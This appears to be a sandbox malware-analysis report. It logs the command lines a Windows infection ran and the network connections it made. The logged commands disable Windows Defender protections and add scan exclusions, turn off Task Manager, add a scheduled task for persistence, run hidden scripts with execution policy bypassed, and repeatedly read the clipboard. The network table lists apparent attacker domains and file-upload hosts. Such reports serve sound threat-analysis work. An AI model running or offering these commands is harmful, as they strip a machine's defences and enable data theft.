C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\feather.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\J8MYoXP5tVFg.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\cscript.exe
cscript C:\Users\Admin\AppData\Roaming\J8MYoXP5tVFg.vbs
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut3zQO7.ps1" -RunAsAdministrator"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut3zQO7.ps1" -RunAsAdministrator
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe""
C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe
"C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x508 0x51c
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\5d3f71723c5e464aa1a06259e50323c0 /t 1440 /p 1804
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\BackgroundTaskHost.exe
"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault52e6eeach2d99h4d8dh8d4fh8968a3b876e1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffeb42b46f8,0x7ffeb42b4708,0x7ffeb42b4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,3842724958874636157,7929843078658686211,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,3842724958874636157,7929843078658686211,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,3842724958874636157,7929843078658686211,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault38459c21h7750h4fc5hb430h1194dc23eeba
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xfc,0x128,0x7ffeb42b46f8,0x7ffeb42b4708,0x7ffeb42b4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,9232472314397068478,9976419592407669725,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,9232472314397068478,9976419592407669725,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,9232472314397068478,9976419592407669725,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\TestEnter.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\TestEnter.bat" "
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\ShowFormat.jpg" /ForceBootstrapPaint3D
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Pictures\My Wallpaper.jpg" /ForceBootstrapPaint3D
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\CloseGoose.bat" "
C:\Windows\system32\taskkill.exe
taskkill /f /im goosedesktop.exe
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\main.ps1"
C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe
"C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\CloseGoose.bat" "
C:\Windows\system32\taskkill.exe
taskkill /f /im goosedesktop.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nova-screen-webview.com | udp |
| US | 172.67.218.107:443 | nova-screen-webview.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:80 | www.google.com | tcp |
| US | 8.8.8.8:53 | 107.218.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 172.67.218.107:443 | nova-screen-webview.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 172.67.218.107:443 | nova-screen-webview.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 172.67.218.107:443 | nova-screen-webview.com | tcp |
| US | 8.8.8.8:53 | nova-sentinel.com | udp |
| IT | 185.196.9.89:443 | nova-sentinel.com | tcp |
| US | 8.8.8.8:53 | 89.9.196.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| FR | 51.178.66.33:443 | api.gofile.io | tcp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:53 | store4.gofile.io | udp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 8.8.8.8:53 | ieatpoop.info | udp |
| US | 8.8.8.8:53 | 245.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.66.178.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| IT | 185.196.9.89:443 | nova-sentinel.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.9.196.185.in-addr.arpa | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| FR | 51.178.66.33:443 | api.gofile.io | tcp |
| US | 172.67.218.107:443 | nova-screen-webview.com | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| IT | 185.196.9.97:443 | ieatpoop.info | tcp |
| US | 172.67.218.107:443 | nova-screen-webview.com | tcp |
| US | 172.67.218.107:443 | nova-screen-webview.com | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 172.67.218.107:443 | nova-screen-webview.com | tcp |
| US | 8.8.8.8:53 | 43.43.201.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.116.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cxcs.microsoft.net | udp |
| BE | 104.68.66.114:443 | cxcs.microsoft.net | tcp |
| BE | 88.221.83.203:443 | www.bing.com | tcp |
